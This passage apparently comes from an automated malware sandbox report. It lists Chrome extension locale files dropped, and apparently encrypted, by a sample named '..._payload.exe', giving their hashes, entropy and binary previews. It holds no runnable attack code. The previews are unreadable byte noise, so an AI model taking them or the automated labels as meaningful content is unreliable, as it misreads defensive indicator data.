                                                                                                                                                                      Preview:{.. .h....._....*........Eq..?..;.. o...\K.h.C{X...l~.N...X.....omg~....(...V....h...+{6.......)..6.t..8.K.s...ea<.......aV....u^.%e..N?...,.X.K....".=..S......l.G.H8..X-...f...^...\j......v.9l(q#Stm.)\?...!..9.z.B..u.7....4...a..R.!.d.._..c.U.axJ...v.u.$..l.fgzj.9.r..s.X.r^n.g.!..v.GL.,m..b.Gy.k..5j..Q...p.&^.x....mr.*.t.O7..q.`./F..*.d.'........az..yYd1..d...;..^}..T...wE....$.3.Pd............h..3.3.1.d}.R...t.j..r..J.@.=.....CrV.AB...........x..%..c. ..k..k./..W..^:u....0......Z`o.....v.-..qZ..O'...tX.L.rZk.~.........y.%_.g..;...6.xY.2..b.F...V.MU....?..>..E...[..'.H.."a....v|.qri.R:...z..... ...3.........#..Z"}3..E;...H.}.]..J...F.`.....@.+..&:.....U..0..i..f*/.~.2VAD.)..R.#....k(i&st.#r.{....Z.F..~.D.,,..E.......: ...a..."=...5.#.?&....*...1..o.".z.../k...&.....P........Kq.K..m&...m.S.<...="g`.>(..t.c.pL......*..w.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):956
                                                                                                                                                                      Entropy (8bit):7.779502823673065
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:5pnEy1Cqdo8/5UbtNnpH32hV9towfyHmgPI9GOAy2QAyeoNxUByecrxQNGKQgUCG:rPo++pNpHGhbaGL6CJ5472oT7Xkg2bD
                                                                                                                                                                      MD5:8C26EB891E32A93B1B1E41C03FD7F094
                                                                                                                                                                      SHA1:2BCC7DFE9FB1AE0F3F458084DB7EED90F5D45B62
                                                                                                                                                                      SHA-256:849FD41F170D96C4949496996B23B2AB31800F4D83041C3E8718365E651E19D5
                                                                                                                                                                      SHA-512:902369309AE3EC2816350B8F3A1FEE178DFD50B3589AD2D36D1059AF4DD9A01369E8C9FD03B96F368921354A7936A1066BB3A8425C1D011C2BC6BDC001DABEE8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. .ymK".J...X].....%.}.!.t...D.4].qJ.I!".qm!3%y..p7.u...o^50.*...K..Z....I...G.....8.........y."Q.......b....}.......9..L..=..4.mqxh.:...-'.....gl.Pg..F.%.S.?:..&m..4...{...o@...w>..g..mEb.E.M.A*....5?....g...u...B....$.?F...R|f....p.\.u.&..5].....Q......"P.#rz. .67t. .V.1B.T^..dw3`.Z.:fy...U5..!.|nx...^;O.'....No-..%....L}..|.B. R.u...V..yv[S..03.W.vt.S.{.^....ce8^..$..+h../B.Y.1{s....>8..1.....5.).S...1....6.%....r$^...\..g...A)4.b0u..+:......!.~.m....*...R..../v.....k.1F.y..R..4&R....0a.v.9Y..5.$h;.]........}.&...j#8.......|P..W'.oY.W..[.Vl......u.t3./{_h.....@.&Nvk..|q.%.:.J/P..u...!}..F..Q.i.*.Y15 ....8...$..Jd..d..'...Y.......L(4.........C.lQ....<o.sO....Q...%..#....P..?.V/..>...Kz...!..E&..U&.L.....8.+...*.......dG..W..F.K..?.j......8....;.>Q...c.../a.<%......Z.........XJT6....y ..;...../...u....F.:.?]...z..E../x.EF...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):975
                                                                                                                                                                      Entropy (8bit):7.774839255442289
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9YSxUPD99hUYLvXGkdfaWWT96M/Cy/nLcWLRRuN15lEwiyrV2bD:9YSxSDHiYLuYaWWIa7SNpipD
                                                                                                                                                                      MD5:4762F3D92DE5E1D29EA95D65F6137714
                                                                                                                                                                      SHA1:AD205664EC13A846866786D6BC7425FFD5EDD807
                                                                                                                                                                      SHA-256:B8EF22A5888E7338B7E2C613C5687B3A2772DA34EA2FA10B740EAC6DFCBC0F41
                                                                                                                                                                      SHA-512:CCB8B31DC0BA4E351FAA564F18E7772420B5267ADB5B7BD0760BBA92C5032F8F8D4C3E7D0B7DF294EB32172DA6C52E22287024BF0BB23B3ED7B8B0865ADC98BB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. s/.=....... ...0..t}p(...F..D..^.%.....1fEf.I.d.}].Q.O.Su.>D&'xZ0..._....@.29.^.}.....W..:.l`b..o.."....R.8..Y..hng..'r..8Z..&j.V...A[]..(.6...r..6.{........>....).....e...u.6V0....h5.Qp..o....7......t........$.e....^fJ|..8lT..ZW..p..9a.Y..B...Y<.{W..."5...~....rK`a...e...O...C..<..,....>#...n./.$4.N4*....!..l.<.pg.U.a.Y..t.q..P;.I.A.Sq._H.N.].P....!1..mr.?w..L..OY...9.h.O.J....%.wq.x..f...~.F..)..x..aLX.......V........82GI...X.Q.;..sJ.z..v........... ..H....P.:>M.:".R c.:... h.e..B.s4...;..l.zl=JIB`.S...V..Z.H.[[...E.|.t...X......i.5./......'\w.2.....)o.yU......d..=' ..S...nn_.Kc....cpd..}.+n..(.r..1!.tMv2{...\.k}U..ic..\..r?G.......{/>R.4.rD.._...y.v.;?^...Y....H..T=....B.0.D..%#\uuW....uYYOn.......Q&s.(..X.....Iw..YdY.`.f0+.v.f@..]l.......x5e.o.....E9gw..-.[.....N.Dz....n.*n>d&..yV...Yi.....9..+.p.._.y....>%"..z..}.hd... J...w.*1.4/;m.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1078
                                                                                                                                                                      Entropy (8bit):7.770551573292745
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:lPqFnNw9Ss7ZIZZrGxWWHU8mLNPCQG6GfBOk+6EDR2bD:jF1IDrGBHxm5PJGNF1E2D
                                                                                                                                                                      MD5:7D8C2F58C64506EBEB21CE2DEF028F2F
                                                                                                                                                                      SHA1:E83F05DF73BC8469DFBECCA2EAB28006B73521A4
                                                                                                                                                                      SHA-256:C14E47632EF8D660304EC64B63344CAE86F78BEC78F0F9145C7C63FA39DD91C8
                                                                                                                                                                      SHA-512:E834E25C40A88CB4092E9F1C41388ACE14F4F2C543713B17EC86BA2E7923D3FD92729EB21E1DADB1054F68C96353DFAF574FC37DBDE4304B9D8DB414F3110DE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. lB.W.A....w......5.UiJ.0.Cd.........Z.}Y...3G...'..........S5R...^....c;Sv.\G.=.jj...n..L.4l|.$..=..DU..r...2b.C.0NG.g..Z.u.......b......U......S.....+K..i.$N.M'.......S.#..Z.nT3...3#...D..mpu......~..GC...;..$N.f....s...u...-.y....o= L.5.8..@...lz.M.ff..w}.X..{....$V./.X...'w}..j9d..0!m.](<X..7.[7.g...eCC)..j.........-...E$....'..M..}<.F4.".g;.2D..i`i..9G.z%..d.".\.{u..Q......C....l..In.+..D......;..V.bk.]i4.3.U....N....p&.p....T...DB^U.j.5r...3.R....|..!.....!....x.."ppq|$f];t...L..)Py2A.\%.vi..KV.2pT.5..<.c..B{~.%-..$.!..l.E.m..0.Qr...!.t.f.|.8...@.+..8."8E.(|...cy.caW...$1....e}..5.O.17..+..N..3...I.}....zY.d2..9W...C...m_@.(..sz.........)i..J.jU.D....p.[.....%#..i;..z.Jo,;Lu.G.+.....0.....yzP.d.+.....\m....I...~.4N....:./..DD...."h.Q. ..E.7......f...d......8....w.L.-\%..C.%........E!8p.L*qRpt-....z.4Hmu.....Ap.....xq.a.....(>t3...m.o/....0....um#if{........$.c...P.......B....c_......#..Q....2.~p.{...fN.a.....=.CC...4.8.w#..R.R

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):981
                                                                                                                                                                      Entropy (8bit):7.802796823427627
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:mKWDmh2y1fcIEUXWrlx8Ddz2vbC2AKD5rpTH1aw2wjSPXs/XHnmOqSSxiVjSU/R7:N2AIZxkQRAK99YwmPjSzVnRW92bD
                                                                                                                                                                      MD5:BEE97A2838163D0483AD82BF19836191
                                                                                                                                                                      SHA1:9888922E55CDB30F78C563DD85F1CAB7E7E969C0
                                                                                                                                                                      SHA-256:C0A9E5380EEED432D33710CEA9C99D77CFA5B45C93E6CBF43CB5EB44AAF42F0B
                                                                                                                                                                      SHA-512:09646500B07F5E9FEEF36AC9129736164B6B68D550544B8A90B9A73E239018B738BA6DA31B1007C0246F4A17E1D698606955A0F6DC3D3AE56568D41D82AB7FCE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ....>..<.#.v...A....X.. .i..7=.....=.....l.'!.uJ...OU..4....`..hJ..{..W3*....x3l]F...Q.4l.>t......z..`+..u...st..kMx..F"{nH..l.qq..&1y*....9.2......0.<.D}(/.Z........|S.....2.?...5...kb.S...w.U.P*u..HX H.k.m.4..?*...:.r.*..".'.~.S.. ...J..."...D%.v....P...B...."w[l.xdW...f%....!....w>..........8.}..:...v'!.o.RO.qK..AiD..w..!..<...PZC.....%.....l..e.......0..!.*..R.K.g.>....qe..\....oqo7....E.:..q.sfR....-\?.V.2..... )GA..GE.2q.Q.2A1....1C>..y.$]..%.....$W.E....x..w8.....R...ol|...i..ST.i%'S....sg.`}(Q.>.:.g.....}.1+..i;7.O<....>...O.?9<.v .}...B.....4..))Y0..E.!...&2!....\H...DO.."M.....`f.... +j..a&..5..\q.d.;-ql.D.gbuSA...FhQur9J.C...+.q.J@..|C..M.,V@"..m.n)N.(......-.L.!s...!q9.V..).....'|.(^Qaf..(.~.....Om...F......q.H....t.x...A..b........_'...X+?..N.......e....;jGJ..._.=z....eS.\......}b......94.L.T..W.w./.s.<\....._.U...kU^........#mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):951
                                                                                                                                                                      Entropy (8bit):7.775784205588927
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:mVawU8SKm5AJyZ4KU3dN2iTDFr4Bai8cxkpuI+NZV2bD:mtB0UKUbblr4QigpkiD
                                                                                                                                                                      MD5:D592F6A88916F3D52E71780E2A5E5712
                                                                                                                                                                      SHA1:F8550F509F73CF4502A97FF88337767742636FCC
                                                                                                                                                                      SHA-256:E965F47F6055B91E0D5F77A717EEF253A6FC49CD44DF33D5B82F6925DBFCCD26
                                                                                                                                                                      SHA-512:E192C628CC7972BFA32070DF5A6ECA94B6FAA759BE7468AB15D60E2A2A5E2CF94EE9AA615FFC1C6D478D0956F6C3E2501A0D8FC881F4E161BBCBF5C28E7F44BF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. .X.]....K.y".}$/..#......P=..5.+......b..*....o..h.$_J$...:.(.....A.....>[zf..L.Q5.%)+.j9...n).....iWb..H.wD..sC.^M&.H.../..Q..Lx.?.:...(...D...7.fY..Du[.....o..('.Q...K0.4..tS.>.M.d....R.T.;..zX..l.B).a.?8....6...&.<0.A..7.46.n...W....&..`........h....lR.l*.,..c.;u.....I#.5....],<.@..${`.hc...^.....r.$.V.......*.c.c.....M...%.6..V5.]...a...\`.:^...+.H.0.`.N.H.....L..)i...K.....z/E_".,.4....i.W/.../..[r.5..$...zfZ...e..At`.......a"........`.."$..5ICyn8......e.?.=.fb9...L.'p..."o.\2.MWS.jj..../.2..s.....G...Z...e.E..D...q.>...Q.By...<K....[...KP.y.M.........m..D`+..am."...h.h..\...b.\|...c._..N(..:....|...^..}uPIZ.Ld.YR1.g=./..a....h.....tR4W._...U...6.q..)_a.wL.#..I........#.,>NB..gr...d......T..2Z....f-....;..P-...m..[.1...=.k..*.EDT[RRk.$?.)^Y..e.9..N.....Se|.x....C..ID..hFSGX*.....n....W.V..........q...2jU.;...zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1077
                                                                                                                                                                      Entropy (8bit):7.825971777791192
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:o9FRWp4f5mM9P7C0pk86ZS1Z+VTSZU3Iz0XwMREgwVI2bD:sWpqDdC0C8YgyaMIYAMRPwJD
                                                                                                                                                                      MD5:9BB6791415B71225A7B51B28922DBFF8
                                                                                                                                                                      SHA1:BEF17FBB5626FB7E279097EAA8FADC4BBC9518A3
                                                                                                                                                                      SHA-256:A41734E69178C756CC1571FA7C86BB7072BDC35FB0547C1AECF262035592D23D
                                                                                                                                                                      SHA-512:FBAFB8B34700AED0CC363294FE8C9802435026A6D14B4FA39FB73570B60E9B89F360FFEB7FE35C516E9F8574C5E3D528E4781386391F6D549F879289C9B7D687
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ..U2.,.M7.-...i.s.q..3U....J6bj_.).3..U{R...,.9.A...z.FJ...&XV...]h......9...`.2.XJ.`........~...~:.B......<.|..]............CSe..l.f..._.O.'.vU..@............j.....*..Y..CS4.a.+.G..8.N>..l...p....O....u..d..v.....'h.r.I......#..z]%./.vO...8....W.....ix...}..)u}.#.uX.....-k....e>.W.o.]...QF.[> .u.....F...X.6...D...{.b.[A.`l... .{.....^C(\...r\..n....... +"~...m..2...0..cZ...:.].j.-..Z....*..T..Q{}......x.....z..../...a.&Y..q.:A..vU..T.>..<.D^}.a.<.E;.;Y......t.6RW..A...Y......@7%.....q.!....[....&..m.\...r.v.f0...u.......@..~../...y....KE..C......d.G.;8h..6...>L.5N$J.n..I...Q....../n......L.`)..a.4&;..N....i...P.u...3W.@..a1.y.%..Nb.......~2..G..u.bB0.H.gC.....&.;r....^W..4.y. 9.WS..W..H.qj3..^..c.........o6vr...<..~.Y.%Y......1S......v.v..3w...p..|.N3...S.i....o:..X.,n/Z.n..O..:3..>x.&OKgV....`.}.W@.j..5}..x.C..(!m..:...M..$8..t.=P.....k@s.B.......7..@G.>..k".oP..!..d.c3d...C...`\a.i..."..o...d..]0R".a..L....n.e..{;....".m

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):964
                                                                                                                                                                      Entropy (8bit):7.799708925600289
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bIHUQSopeWn/N1Rkd/slkQb0vJV0BRPDHsXM2bD:EUQSopL11RkZH0BRPDYD
                                                                                                                                                                      MD5:5C30C7F4A53563708D1DBD278FF653AA
                                                                                                                                                                      SHA1:D5DD4E0FAF11AA7BA11A5DFF6592073A04A07357
                                                                                                                                                                      SHA-256:CA9168C070614A7316E1754BB2ABC0CDF51DBC88B10FA10F219CD913431C6571
                                                                                                                                                                      SHA-512:9D4851A3C6A1128EE26404C9CC955919CBD0B29ECD06C8CD51118B0C34ABE0CDA02555B29941C949A200839077CFFF938A714ECB8C6876935EDE9EED8896D557
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ^.@.?..pf.R.\B.l....J0......d.'A...X...h."....|...vjb...<.B..~5..e..x.......q.......3..*..Q....x....$V..|..;..k+Bi..Q..W..nN..B.J~.......A.&...s.!..Egv....;..j+.mV..r..k_........J..G].'|...Y...G.(.]..-..hj~.>k.D..g.l(.z....@P...U.7.Y.zU..B.v.b.l....U9F..4....78..........xr..>..u.^1.....4..z...+.@J.|.-..H...y.!........u....SB...uL.f.d.|...|......g...}.....B..7@0..=....H7....?.U..w..0..|s....5.sD.#..I.B...4.[....p..B".....)....t...D.....x.4.o.l+.x[.`...e.^%.}3..I?S.~.\.SDO.&.l...k.K....+.#-...au.O4.k.y=5.m. M......V.h.2T%.r.4w......KL.."....`...o..`.<......%X...X>KD.*.!.k. .Z....x...n...Hz..K..:+.ec.8.!....}.T.N.T.;..j>.F..F.cp....4.5.J.l.}..G.}....nsp..g..A$6.NTG].!.]..*h....^i....[..,......d|AT..Y;....U...X.L....b;AM..*P~|.gg.1#...8p...U>ce\.{!......4..3.b..D.t...4!...#......S.*..m1.I.y.2&.v.oW.._A.8..%.$T......Q..7...^.X=mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1279
                                                                                                                                                                      Entropy (8bit):7.851447833395457
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yPsILsic+ykklpqCBSmh32y1Hqx/wklP1UkeiiD0R52UDy9HgUT5xTP62bD:esiVyr532yVq9w61URi7R4R95JD
                                                                                                                                                                      MD5:FA7DD5637CE2E02F8B1016FCA3045FCE
                                                                                                                                                                      SHA1:F48282F566571FAFD6B0787CEB42ED9FEF45DF2A
                                                                                                                                                                      SHA-256:DA3F5ED58BF9252E125F237CC01B881070F07AA17EDB1DC0BBA7D1F1A7B30A79
                                                                                                                                                                      SHA-512:05439E684D038D8AF2FFE948F0A4A91D6D190BB55E5E5EDB3FA053360E17C697B872309EC2983A8837A558FB72B70D62A24BE26C3C73792BFFC6D7A0725FA5F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. .;.........Yx.....N.q..s..C.l{..+....b<.R.X9...'../.....&?..H..E.:....W.K...A...X.,....%....d.a..a.......=.{C.p..,..L............;......x........U.w`..F!>n..o...s{...@..3....B...'..u]....v3W.ZL..?-.Itd.<...X{L....U.....p..i..Fp.....~!..Qt.h.......f......*..O.....H:t..q9......<..z....k*........@z@.^.M.2...Pbi.......Q....(...&I..d/...(.C.~...."...:g..j.-..%.U$^...l;}.....].D...c.Ql.......a8m.._W.5.....8.].....'.n..s.TM.9.G......Y..0i7..}!dy(..@..X.........I=.J..i.^.)./D\.....c&fj.s#`b'..X...".y.0...C..X..$.d..n.jl..Tp......5rX~5.0..}7.i.6.5...g.,..s...).;....M.....j4[.p=\e.l..D0z...u.8p......;.k..%,b...D.}.4!.]Q.O ..v...\].Wsd_S....B...z-....D.g+>..~...._N....}..G..S.....1H.&..x.'0.o. {...M.*.*.5.(.a..y.f.......L0e[q....3(K..F.V@....2.<......n..k..d7....DD.....@. o@Y..@.A.z...........d.W?.m..6..\..Vd..V({..1.~W.7....0.M.......zU..,5......S....|...Uq./ ...BzDa..7opz.Y\..v&n1.......s.Ukg1S;LPk....;F#.|...$@e.^A..C..+ N.p.]<i..

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                      Entropy (8bit):7.780746342630241
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pYRWVvb/p+04Kk3B/DPCxxLD/71+/++v8Q9Oo2bD:SRWVj/pp4uz71+mD
                                                                                                                                                                      MD5:001191EB1D84F77A7F0EC8478A9B1052
                                                                                                                                                                      SHA1:DDFF5DEA65F720FD0E97297E45F57A89F7CCA1D5
                                                                                                                                                                      SHA-256:401214FF9CD589B51CD78C64545BE741729E25D2E9B125DBE299B66C7EA0A89A
                                                                                                                                                                      SHA-512:23EE4D04AC1B462CD9EF40C4B331669A6503A52623062778413DA1E4962C3F9811AC34E56CE5D2451BA1F7D172D4B60EABFCD036009A51591A52A84AC663BB10
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. ..g:...d....d....T..!..Z..-x...;+3.Cg.C...b.....t..7..@..g.ZM..v.v.4...@q...".q.6......8...Q...Q.Dy..g~.p^..7..<..OST.....Y,..S..:5.-..A`...".q....R..xV.tW=..e...T..$.w%..4.w...Q......{...U8....S4...x8F2..8.~..n7k..(g....x..:4.....`..$T..u...M7..0..\..J9=u..N0..*...O.4.......,..P...H...U..U.*/#.. ..../*/.$~..+....YY..NN[...-....w.H..e.k.s.(.k.....+.:..}p..1.p.,..V....x..AAz.O.yP.).v.[.....b....`....'......t.G.......8... .4...0{4..^..|C...d..nmG)..9../..:....v...Z.....k..QV...d.V.V..u..ti\....GJ\...b..'..dK..(`s...4.@,gF..~&.{..iU.hh.c.w.\/=.QS .v..[...v.......R3..I_.e....0.d...#2.......W3owUW.yqV..D...U..\..$.BRs......Z.............vD..bZ....}.b2.....7.aH.......{Q.)..@.J......Wd16...b......p.H...f.W&.......v.I-;..2..}...'"!L.(|..^.f.oT>K....".Rq..U2............(.P...'1%.{......T..W.....W#.?`.m.yw..N...$.9.<....q.0}.)mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1054
                                                                                                                                                                      Entropy (8bit):7.802146897694403
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:/1KUHKYURdHvIEDsHhyRKQGU9Nlc5Svz9iMTYX5tyJqFS7T2bD:/1REdHQ7huKQZz9/YX5tyd7AD
                                                                                                                                                                      MD5:0A85DA3EDC57CD89E34F12A8A159EDCF
                                                                                                                                                                      SHA1:33B0B56730ED793B7630C016C1629AACAD6A1ED3
                                                                                                                                                                      SHA-256:B5F17B30A096EFBA11D929915856D90C647D9B0C54FAE70376FE465A2077DD55
                                                                                                                                                                      SHA-512:0A0D9EE9A0F59F0E45A68D75C1868287F9F8DDA8CAE687EA79506FED55AF7E238401BB70DA145F9B16FD7EA25A74121D6E3403FAFBCDA0B6C9D2661F5BAFD170
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. z..kb'_Np..l..\...s.........9.pi...#w.~c...'..#......T.......(.QF......y=....f<...q.}..c=.....l5..b5.H2..Z.{..(X).M.V.B>..@..[..l..}./.CN9.nM....6..)'..z.J.....'Bim......OW.I.....].OB=...+x.......M...^.3..z{..Y..bSP..PoA2.....-..=...Lt.......h(..ly.}.i.0..h.5z...'. iB.........0..J>.vPi...(....3..._..:.P...p.-..:M.Nw..l[7..}.@d..t..wTK.E....C$.:8,.l.TS0.x.G..;..n..g........u......B...$.6.H...h.H/...0.....uPU.hJ..y]f.R..E.2...k*.@+..X...`%~3.#.WF...G.KzE.C8..b...k/..W.JA..De....mo.h{Mq..'......|..*...;.2..0[.....O=03.I...._..5.....An....."..".tO...&2.......Wt.....C.5.`.>...nPf.....A..S.|......f7.0..n...vD..[..41-.........$...f....Vu)/dB.w:...~....lJ.i;.:&m..L)...}.hos>.E_5.D|...X0.$..*.....fb8{;...kl..x..mu.J..=....VI.3.K!..[....g.+.Z.N..%..M.......3c.@.R.. ....3,5+%..G....B..G......c..t........C..x....I.d\.A.NUyl.o....S...V....i.O...08Q.....(.r.o.k.c...^[x4.Q9-.,....*...9e.}....B.yu...`.j..=.3...5.H.......mMsRxMUuXypapZbGOAfxD9pc

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\messages.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1029
                                                                                                                                                                      Entropy (8bit):7.821030298906286
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:LeB56mK0bNGADfgvXQjDIY7V1ew17JSTfgsPHHN1z2bD:yB0mnhGifgvTYp1ew17QTf7HHcD
                                                                                                                                                                      MD5:5CF128BE36E7E8A789BEF6BD4B9616C5
                                                                                                                                                                      SHA1:35F79E97BA905D8A41CAC424131C231632B611E8
                                                                                                                                                                      SHA-256:90A20EC412A3F35F4CD048985C9A7F3D3729AE173D8BA0AE126F8B305EBFD744
                                                                                                                                                                      SHA-512:24E9BDBD2F8D7ECCFE3D92C34414549B24E2906E5B7520EB5B580C936987F31E7E2D490067C0770A1F8441B3814BCFDC890880739BE565565A5114E1D044B5FE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{.. .........y.b..G.QT.....p......%57._+j..&*+.......q......jx.....#.....U.b.X...W..@'........ksQ.(D...l.yZ......).U.`...q.Z..!.W.-......"...-.@W^...)..\.o.s.YZ...3.t...T.^...R......D.>......@......54E.6.<....F"...w....M.w..W.6K VL...SX....d.I.J.=.H....L..Gv .q.z.{....x.+c....z...|..IP..?.-..,`........I..*..*`......F..C,.}E.W.C.Z.u.K.u..!.G..@.S.`....br....mZ..1...e.W.r...#dv...r4.x....r...#....X@b.. V..y.<..E?P..d..j_....>Q$D......xJ...w.-G...*<..b.....`=M.Pv..WV1...w.00..lG..Z....}...h.OH......}"/.F6p..9.P..T...p*.].ec..,..X....0I5<{Q......U.UF.lz.7........-...e...H.i.s.!^.P...%....[..5....:kI..Tc7...h#.b.3.........a].Nv...v.../.9.v...s)E........Hz....{.>....U.Y...C.......~+.>...'\.FZ...4..dB_...L..9........As9......f...I....6..<DV.."..xv.<NLu=h...{.L.+.?Z...1X.9.3Z.!....|p....T.^./..L......r.W.-..X;}.@.uT+.@.e.......))-.S..!&.LU..V..d....b;...D...h.&.......__.]>:.A....0..0...F..??d.< ......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9

                                                                                                                                                                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN\messages.json

                                                                                                                                                                      Download File
